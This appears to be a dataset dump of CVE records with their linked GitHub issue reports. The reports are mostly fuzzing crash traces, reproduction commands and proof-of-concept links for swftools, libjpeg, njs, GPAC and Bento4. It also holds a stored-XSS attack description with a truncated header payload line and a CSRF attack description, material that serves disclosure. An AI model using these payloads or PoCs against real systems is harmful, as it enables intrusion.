"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/matthiaskramm/swftools/issues/173"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*",
"matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59",
"versionEndExcluding": null,
"versionEndIncluding": "2020-12-22",
"versionStart... | https://github.com/matthiaskramm/swftools/issues/173 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | ### system info
Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082)
### Command line
./src/swfdump -D @@
### AddressSanitizer output
==29246==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61600000ffa0 at pc 0x00000044059d bp 0x7fffffffd270 sp 0x7fffffffd260
WRITE of size 2 at 0x61600000ffa0... | heap-buffer-overflow exists in the function swf_FontExtract_DefineTextCallback in swftext.c | https://api.github.com/repos/swftools/swftools/issues/173/comments | 0 | 2021-10-07T13:13:41Z | 2021-10-07T13:13:41Z | https://github.com/swftools/swftools/issues/173 | 1,020,030,975 | 173 |
CVE-2021-42200 | 2022-06-02T14:15:29.943 | An issue was discovered in swftools through 20201222. A NULL pointer dereference exists in the function main() located in swfdump.c. It allows an attacker to cause Denial of Service. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/matthiaskramm/swftools/issues/170"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*",
"matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59",
"versionEndExcluding": null,
"versionEndIncluding": "2020-12-22",
"versionStart... | https://github.com/matthiaskramm/swftools/issues/170 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | ### system info
Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082)
### Command line
./src/swfdump -D @@
### AddressSanitizer output
==1975==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000406f68 bp 0x7fffffffe3a0 sp 0x7fffffffdf30 T0)
#0 0x406f67 in main /test/swftools-a... | A NULL pointer dereference exists in the function main in swfdump.c | https://api.github.com/repos/swftools/swftools/issues/170/comments | 0 | 2021-10-07T13:06:05Z | 2021-10-07T13:06:05Z | https://github.com/swftools/swftools/issues/170 | 1,020,023,108 | 170 |
CVE-2021-42201 | 2022-06-02T14:15:29.987 | An issue was discovered in swftools through 20201222. A heap-buffer-overflow exists in the function swf_GetD64() located in rfxswf.c. It allows an attacker to cause code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/matthiaskramm/swftools/issues/175"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*",
"matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59",
"versionEndExcluding": null,
"versionEndIncluding": "2020-12-22",
"versionStart... | https://github.com/matthiaskramm/swftools/issues/175 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | ### system info
Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082)
### Command line
./src/swfdump -D @@
### AddressSanitizer output
==8687==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b00000aff8 at pc 0x000000473b4e bp 0x7fffffffdc10 sp 0x7fffffffdc00
READ of size 8 at 0x60b00000aff8 t... | heap-buffer-overflow exists in the function swf_GetD64 in rfxswf.c | https://api.github.com/repos/swftools/swftools/issues/175/comments | 0 | 2021-10-07T13:20:00Z | 2021-10-07T13:20:00Z | https://github.com/swftools/swftools/issues/175 | 1,020,037,867 | 175 |
CVE-2021-42202 | 2022-06-02T14:15:30.030 | An issue was discovered in swftools through 20201222. A NULL pointer dereference exists in the function swf_DeleteFilter() located in swffilter.c. It allows an attacker to cause Denial of Service. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/matthiaskramm/swftools/issues/171"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*",
"matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59",
"versionEndExcluding": null,
"versionEndIncluding": "2020-12-22",
"versionStart... | https://github.com/matthiaskramm/swftools/issues/171 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | ### system info
Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082)
### Command line
./src/swfdump -D @@
### AddressSanitizer output
==5769==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000042ba78 bp 0x000000000073 sp 0x7fffffffdea0 T0)
#0 0x42ba77 in swf_DeleteFilter modu... | A NULL pointer dereference exists in the function swf_DeleteFilter in swffilter.c | https://api.github.com/repos/swftools/swftools/issues/171/comments | 0 | 2021-10-07T13:09:20Z | 2021-10-07T13:09:20Z | https://github.com/swftools/swftools/issues/171 | 1,020,026,516 | 171 |
CVE-2021-42203 | 2022-06-02T14:15:30.083 | An issue was discovered in swftools through 20201222. A heap-use-after-free exists in the function swf_FontExtract_DefineTextCallback() located in swftext.c. It allows an attacker to cause code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/matthiaskramm/swftools/issues/176"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*",
"matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59",
"versionEndExcluding": null,
"versionEndIncluding": "2020-12-22",
"versionStart... | https://github.com/matthiaskramm/swftools/issues/176 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | ### system info
Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082)
### Command line
./src/swfdump -D @@
### AddressSanitizer output
==25679==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000d6a0 at pc 0x00000044059d bp 0x7fffffffd270 sp 0x7fffffffd260
WRITE of size 2 at 0x60600000d6a0 ... | heap-use-after-free exists in the function swf_FontExtract_DefineTextCallback in swftext.c | https://api.github.com/repos/swftools/swftools/issues/176/comments | 1 | 2021-10-07T13:21:58Z | 2022-05-31T23:28:37Z | https://github.com/swftools/swftools/issues/176 | 1,020,039,831 | 176 |
CVE-2021-42204 | 2022-06-02T14:15:30.127 | An issue was discovered in swftools through 20201222. A heap-buffer-overflow exists in the function swf_GetBits() located in rfxswf.c. It allows an attacker to cause code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/matthiaskramm/swftools/issues/169"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*",
"matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59",
"versionEndExcluding": null,
"versionEndIncluding": "2020-12-22",
"versionStart... | https://github.com/matthiaskramm/swftools/issues/169 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | ### system info
Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082)
### Command line
./src/swfdump -D @@
### AddressSanitizer output
==28613==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000efdf at pc 0x00000047238d bp 0x7fffffffdbe0 sp 0x7fffffffdbd0
READ of size 1 at 0x60300000efdf ... | heap-buffer-overflow exists in the function swf_GetBits in rfxswf.c | https://api.github.com/repos/swftools/swftools/issues/169/comments | 0 | 2021-10-07T13:00:58Z | 2021-10-07T13:00:58Z | https://github.com/swftools/swftools/issues/169 | 1,020,017,571 | 169 |
CVE-2022-29648 | 2022-06-02T14:15:50.000 | A cross-site scripting (XSS) vulnerability in Jfinal CMS v5.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted X-Forwarded-For request. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/34"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/jflyfox/jfinal_cms/issues/34 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jflyfox",
"jfinal_cms"
] | There is a storage XSS vulnerability in the guest TOP10 of jfinal_cms. TOP10 will display the ip of the user, but it can be modified by X-Forwarded-For, where the attacker can insert malicious XSS code. When the administrator logs in, the malicious XSS code triggers successfully.
payload: X-Forwarded-For: 192.168.1... | There is an xss vulnerability of HTTP header injection storage in jfinal_cms V5.1.0 | https://api.github.com/repos/jflyfox/jfinal_cms/issues/34/comments | 0 | 2022-04-14T02:59:27Z | 2022-04-15T01:12:18Z | https://github.com/jflyfox/jfinal_cms/issues/34 | 1,203,980,157 | 34 |
CVE-2022-29779 | 2022-06-02T14:15:51.160 | Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_value_own_enumerate at src/njs_value.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/commit/2e00e95473861846aa8538be87db07699d9f676d"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://g... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nginx:njs:0.7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "6BD0BCE5-65F7-4B13-BD30-E80964201D0C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | https://github.com/nginx/njs/issues/485 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | # Environment
OS : Linux leanderwang-LC2 5.13.0-30-generic https://github.com/nginx/njs/issues/33 SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : https://github.com/nginx/njs/commit/f65981b0b8fcf02d69a40bc934803c25c9f607ab
Version : 0.7.3
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
... | SEGV src/njs_value.c:240 in njs_value_own_enumerate | https://api.github.com/repos/nginx/njs/issues/485/comments | 0 | 2022-03-16T09:40:33Z | 2022-04-23T00:05:07Z | https://github.com/nginx/njs/issues/485 | 1,170,769,314 | 485 |
CVE-2022-29780 | 2022-06-02T14:15:51.203 | Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_array_prototype_sort at src/njs_array.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/commit/8b39afdad9a0761e0a5d4af1a762bd9a6daef572"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://g... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nginx:njs:0.7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "6BD0BCE5-65F7-4B13-BD30-E80964201D0C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | https://github.com/nginx/njs/issues/486 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | # Environment
OS : Linux leanderwang-LC2 5.13.0-30-generic https://github.com/nginx/njs/issues/33 SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : https://github.com/nginx/njs/commit/f65981b0b8fcf02d69a40bc934803c25c9f607ab
Version : 0.7.3
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address... | SEGV in njs_array_prototype_sort | https://api.github.com/repos/nginx/njs/issues/486/comments | 1 | 2022-03-21T02:29:41Z | 2022-04-23T00:53:30Z | https://github.com/nginx/njs/issues/486 | 1,174,808,007 | 486 |
CVE-2022-30503 | 2022-06-02T14:15:53.390 | Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_set_number at src/njs_value.h. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/commit/5c6130a2a0b4c41ab415f6b8992aa323636338b9"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/nginx/n... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nginx:njs:0.7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "6BD0BCE5-65F7-4B13-BD30-E80964201D0C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | https://github.com/nginx/njs/issues/478 | [
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | # Environment
OS : Linux leanderwang-LC2 5.13.0-30-generic https://github.com/nginx/njs/issues/33~20.04.1-Ubuntu SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : https://github.com/nginx/njs/commit/f65981b0b8fcf02d69a40bc934803c25c9f607ab
Version : 0.7.3
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsan... | SEGV src/njs_value.h in njs_set_number | https://api.github.com/repos/nginx/njs/issues/478/comments | 1 | 2022-03-01T10:21:25Z | 2022-05-07T01:57:07Z | https://github.com/nginx/njs/issues/478 | 1,155,152,026 | 478 |
CVE-2022-31796 | 2022-06-02T14:15:58.153 | libjpeg 1.63 has a heap-based buffer over-read in HierarchicalBitmapRequester::FetchRegion in hierarchicalbitmaprequester.cpp because the MCU size can be different between allocation and use. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/thorfdbg/libjpeg/commit/187035b9726710b4fe11d565c7808975c930895d"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jpeg:libjpeg:1.63:*:*:*:*:*:*:*",
"matchCriteriaId": "13A26F18-0121-441E-AEF2-B13F7E608A8F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding"... | https://github.com/thorfdbg/libjpeg/issues/71 | [
"Third Party Advisory"
] | github.com | [
"thorfdbg",
"libjpeg"
] | There is a heap-overflow in HierarchicalBitmapRequester::FetchRegion in hierarchicalbitmaprequester.cpp.
reproduce steps:
1. unzip poc.zip
2. compile libjpeg with address sanitizer enabled
3. run jpeg ./poc /dev/null
poc
[poc.zip](https://github.com/thorfdbg/libjpeg/files/8759320/poc.zip)
stack trace
... | heap-overflow in HierarchicalBitmapRequester::FetchRegion | https://api.github.com/repos/thorfdbg/libjpeg/issues/71/comments | 6 | 2022-05-24T03:23:18Z | 2022-05-26T17:06:18Z | https://github.com/thorfdbg/libjpeg/issues/71 | 1,245,927,743 | 71 |
CVE-2022-32201 | 2022-06-02T14:16:01.213 | In libjpeg 1.63, there is a NULL pointer dereference in Component::SubXOf in component.hpp. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/thorfdbg/libjpeg/commit/ea6315164b1649ff932a396b7600eac4bffcfaba"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisor... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libjpeg_project:libjpeg:1.63:*:*:*:*:*:*:*",
"matchCriteriaId": "E19EEAA5-8206-4988-90CB-8C560A0B932C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStar... | https://github.com/thorfdbg/libjpeg/issues/73 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"thorfdbg",
"libjpeg"
] | ## reproduce steps
1. compile libjpeg with address sanitizer
2. run `./jpeg ./poc /dev/null`
## poc
[poc.zip](https://github.com/thorfdbg/libjpeg/files/8798327/poc.zip)
## stack trace
```
=================================================================
==3114171==ERROR: AddressSanitizer: SEGV on unknown ... | null pointer dereference in Component::SubXOf in component.hpp | https://api.github.com/repos/thorfdbg/libjpeg/issues/73/comments | 2 | 2022-05-30T12:33:53Z | 2022-05-31T07:10:25Z | https://github.com/thorfdbg/libjpeg/issues/73 | 1,252,677,631 | 73 |
CVE-2022-32202 | 2022-06-02T14:16:01.253 | In libjpeg 1.63, there is a NULL pointer dereference in LineBuffer::FetchRegion in linebuffer.cpp. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/thorfdbg/libjpeg/commit/51c3241b6da39df30f016b63f43f31c4011222c7"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisor... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libjpeg_project:libjpeg:1.63:*:*:*:*:*:*:*",
"matchCriteriaId": "E19EEAA5-8206-4988-90CB-8C560A0B932C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStar... | https://github.com/thorfdbg/libjpeg/issues/74 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"thorfdbg",
"libjpeg"
] |
## stack trace
```
jpeg Copyright (C) 2012-2018 Thomas Richter, University of Stuttgart
and Accusoft
For license conditions, see README.license for details.
*** Warning -1038 in Tables::ParseTables, line 1386, file tables.cpp
*** Reason is: found invalid marker, probably a marker size is out of range
***... | null pointer dereference in LineBuffer::FetchRegion in linebuffer.cpp | https://api.github.com/repos/thorfdbg/libjpeg/issues/74/comments | 1 | 2022-05-31T09:21:46Z | 2022-05-31T10:19:20Z | https://github.com/thorfdbg/libjpeg/issues/74 | 1,253,583,604 | 74 |
CVE-2021-40592 | 2022-06-08T18:15:08.173 | GPAC version before commit 71460d72ec07df766dab0a4d52687529f3efcf0a (version v1.0.1 onwards) contains loop with unreachable exit condition ('infinite loop') vulnerability in ISOBMFF reader filter, isoffin_read.c. Function isoffin_process() can result in DoS by infinite loop. To exploit, the victim must open a specially... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/commit/71460d72ec07df766dab0a4d52687529f3efcf0a"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CCA1FE1D-17AE-45F9-A7BD-A8316EE859D6",
"versionEndExcluding": "1.0.1",
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/gpac/gpac/issues/1876 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Hi. There is an infinite loop bug in MP4Box. to reproduce, follow the command below with the attachment file.
```
./MP4Box -nhnt 1 hang_file -out /dev/nul
```
[hang_file.zip](https://github.com/gpac/gpac/files/6991064/hang_file.zip)
Credit : ADLab of Venustech | Infinite Loop in MP4Box | https://api.github.com/repos/gpac/gpac/issues/1876/comments | 0 | 2021-08-16T09:08:59Z | 2021-08-30T15:33:42Z | https://github.com/gpac/gpac/issues/1876 | 971,526,752 | 1,876 |
CVE-2022-30898 | 2022-06-09T19:15:10.643 | A Cross-site request forgery (CSRF) vulnerability in Cscms music portal system v4.2 allows remote attackers to change the administrator's username and password. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/37"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "1865339A-4927-439D-9D16-D38C8330CB92",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding"... | https://github.com/chshcms/cscms/issues/37 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | details
In cscms v4.2 A problem was found in 1
Cross-site request forgery (CSRF) vulnerability in /Cscms_4.2/upload/admin.php/sys/save allow remote attackers to change
administrator's username and password.
Trigger condition: the administrator clicks a malicious link
Cause of vulnerability:
We can find that... | Cross-site request forgery vulnerability exists in Cscms music portal system v4.2 | https://api.github.com/repos/chshcms/cscms/issues/37/comments | 0 | 2022-05-12T08:31:17Z | 2022-05-12T08:40:47Z | https://github.com/chshcms/cscms/issues/37 | 1,233,634,156 | 37 |
CVE-2022-32978 | 2022-06-10T15:15:08.090 | There is an assertion failure in SingleComponentLSScan::ParseMCU in singlecomponentlsscan.cpp in libjpeg before 1.64 via an empty JPEG-LS scan. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/thorfdbg/libjpeg/commit/4746b577931e926a49e50de9720a4946de3069a7"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisor... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jpeg:libjpeg:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A438F885-68BD-47F9-A55F-42EA445EF19D",
"versionEndExcluding": "1.64",
"versionEndIncluding": null,
"versionStartExcluding":... | https://github.com/thorfdbg/libjpeg/issues/75 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"thorfdbg",
"libjpeg"
] |
## stack trace
```
─────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7053859 in __GI_abort () at abort.c:79
#2 0x00007ffff7053729 in __assert_fail_base (fmt=0x7ffff71e9588 "... | Abort in SingleComponentLSScan::ParseMCU | https://api.github.com/repos/thorfdbg/libjpeg/issues/75/comments | 1 | 2022-06-08T09:09:39Z | 2022-06-08T10:59:47Z | https://github.com/thorfdbg/libjpeg/issues/75 | 1,264,435,121 | 75 |
CVE-2022-31282 | 2022-06-10T18:15:08.627 | Bento4 MP4Dump v1.2 was discovered to contain a segmentation violation via an unknown address at /Source/C++/Core/Ap4DataBuffer.cpp:175. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/708"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.2:*:*:*:*:*:*:*",
"matchCriteriaId": "F7A3D679-CF47-47D3-AED0-94803AC18598",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | https://github.com/axiomatic-systems/Bento4/issues/708 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | SUMMARY: AddressSanitizer: SEGV on unknown address 0x000000000000 in /Source/C++/Core/Ap4DataBuffer.cpp:175
- Version
```
$ ./mp4dump
MP4 File Dumper - Version 1.2
(Bento4 Version 1.6.0.0)
(c) 2002-2011 Axiomatic Systems, LLC
```
branch [d02ef82](https://github.com/axiomatic-systems/Bento4/commit/d02ef8230a8... | SEGV on unknown address 0x000000000000 in /Source/C++/Core/Ap4DataBuffer.cpp:175 | https://api.github.com/repos/axiomatic-systems/Bento4/issues/708/comments | 0 | 2022-05-08T16:25:44Z | 2022-05-08T16:25:44Z | https://github.com/axiomatic-systems/Bento4/issues/708 | 1,228,929,453 | 708 |
CVE-2022-31285 | 2022-06-10T18:15:08.820 | An issue was discovered in Bento4 1.2. The allocator is out of memory in /Source/C++/Core/Ap4Array.h. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/702"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.2:*:*:*:*:*:*:*",
"matchCriteriaId": "F7A3D679-CF47-47D3-AED0-94803AC18598",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | https://github.com/axiomatic-systems/Bento4/issues/702 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | SUMMARY: AddressSanitizer: allocator is out of memory in /Source/C++/Core/Ap4Array.h:172
- Version
```
$ ./mp42hls
MP4 To HLS File Converter - Version 1.2
(Bento4 Version 1.6.0.0)
(c) 2002-2018 Axiomatic Systems, LLC
```
